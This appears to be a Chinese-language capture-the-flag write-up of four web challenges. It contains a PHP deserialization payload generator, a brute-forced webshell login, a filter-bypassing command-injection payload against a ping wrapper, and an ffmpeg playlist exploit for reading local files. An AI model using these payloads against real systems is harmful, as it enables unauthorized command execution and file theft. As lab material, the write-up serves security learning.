popop

访问class.php

简单，直接exp

<?php

class s{
    public $f;
    public function __construct()
    {
        $this->f = new T;
    }
}
class T{
    public $f;
    public $s;
    public function __construct()
    {
        $this->s = "Getflag";
        $this->f = new L;
    }
}
class L{
    private $haha;
    public function __construct()
    {   
        $this->haha = "mama";
    }
}

$o = new s;
echo urlencode(serialize($o));

被加密的后门

dirsearch扫后台得到phpinfo.php和www.zip、fuck.php

源码泄露得到如下

phpinfo.php得到qq号：841350625

离谱加qq

访问a.txt获得密码字典，使用md5加密爆破获得密钥：18c92bfa21a90caa5cdf41c00db3a891

连接后根目录获得flag！

spa&col

访问robots.txt

获得

/9#S@Q&b?#Mm0+21?
/ix3n3.ksk

第一个base92解码，获得Atbash Cipher

通过Atbash Cipher解码/ix3n3.ks得到/rc3m3.php

<?php
        highlight_file(__FILE__);
        error_reporting(0);
                $code = $_POST['code'];
                if(isset($code)){
                    if(preg_match('/ /',$code)){
                        die("IP Not Found.");
                        }else{
                        if(!(preg_match('/&|\||;|\$/',$code))){
                            echo exec("/bin/ping -c 4".$code);
                            }else{
                            die("Hacked By k3clov3r!");
                    }
                 }
                }
                ?>

code=%0ased%09-n%09"2p"%09flag.php

upload demo

找到exp

https://github.com/neex/ffmpeg-avi-m3u-xbin

python3 .\gen_xbin_avi.py file:///var/www/flag_aaaa.txt 123.avi

生成的文件直接传上去

或者手动生成

https://www.cnblogs.com/xkfz007/articles/6415527.html

生成文件123.m3u8上传

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
file:///var/www/flag_aaaa.txt
#EXT-X-ENDLIST